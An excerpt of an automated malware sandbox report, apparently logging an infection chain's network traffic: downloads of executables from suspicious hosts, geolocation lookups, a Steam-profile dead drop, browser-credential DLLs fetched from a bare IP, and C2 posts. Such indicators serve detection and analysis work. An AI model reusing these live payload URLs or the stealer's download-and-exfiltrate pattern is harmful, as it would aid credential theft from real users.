Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 12_2_0040CF10
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic HTTP traffic detected: GET /file/d/1Qqy-57DLmiipUvNEOUGrNV3pL-1VKzB_/view?usp=sharing HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.com
Source: global traffic HTTP traffic detected: GET /e0cbefcb1af40c7d4aff4aca26621a98.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: jennyilis.com
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /2b7fa37605b0ad5f1a14cbc68bbdca6f/e0cbefcb1af40c7d4aff4aca26621a98.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kilperdoper.com
Source: global traffic HTTP traffic detected: GET /attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe?ex=660740c1&is=65f4cbc1&hm=fd820d24e53345690281599b22ef3adb9ee8518e9dbf6fb23e9b0949a35af707& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sajdfue.com
Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sajdfue.com
Source: global traffic HTTP traffic detected: GET /osminogs.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: m2reg.ulm.ac.id
Source: global traffic HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sajdfue.com
Source: build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: DB15.exe, 00000013.00000003.2940093378.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: DB15.exe, 00000011.00000003.2940501375.0000000003430000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: DB15.exe, 00000013.00000003.2940777429.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: trad-einmyus.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
Source: global traffic HTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Thu, 28 Mar 2024 16:51:23 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:44:22 GMTAccept-Ranges: bytesContent-Length: 744Vary: Accept-EncodingContent-Type: text/html
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 28 Mar 2024 16:51:25 GMTContent-Type: text/html; charset=utf-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/docs-ttReferrer-Policy: originX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=512=dmDo8OUs1Dh_SH2CoFYz06Eio_Ao_PKWwCOGf0G4r33OGV2xphJa0LlfSc1X5XJqO5CfTRsHV5wK875xl0PkQQilAqO8Wq5JKQmBdu1c4EMDiEndK2XcoiA2onhuuBtr8m19WMevgUR8bvIldS8IH9CmAMTkZBZMtR3QsOGd2TE; expires=Fri, 27-Sep-2024 16:51:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Mar 2024 16:51:31 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 235Connection: closeCF-Ray: 86b92018ade12099-IADCF-Cache-Status: EXPIREDAccept-Ranges: bytesCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 28 Mar 2025 16:51:31 GMTVary: Accept-Encodingalt-svc: h3=":443"; ma=86400x-guploader-uploadid: ABPtcPo3f-t4OqZUlu8FHazd44yaLA1o9wXw6zs9SGp0miVAry0RuU9Rm2eTFlvDGAFdzgep9jfRJAE5HQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=GuqLQwTbDEsJ74Kqqr9XrNs0IzF1P7Oi4yY5Dgquclo-1711644691-1.0.1.1-UYDHBONP..JMKy.YZo_AuDEXN0vfKEyN3WY8WzTHGb4lSIwFSUdRKe6wiMciG.9tlWZnFPfRV0acUDYf1HIXvA; path=/; expires=Thu, 28-Mar-24 17:21:31 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DP75H5rgiATZrlkDmYbjwS5kqCgBOu65gNeYcIRphlWh53z0OCzaS0av9Av08WVbMrm7snO3c6prX7PqjYgUVpXkKZWhpX%2B3QNIBSvgXhPRffXPzt6VDWsmURGm0jBKSiZr%2FIQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=rEeEjDGTiGP2KazGOQqzDfjp3ZL6UsTD6OT1PnC0qDM-1711644691388-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:12 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 38 0d 0a 04 00 00 00 79 fa f6 10 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:12 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:14 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 34 46 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4F73|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:14 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:15 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:15 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:50:16 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 32 43 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2CI:82O@c^`_S10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:04 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:04 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
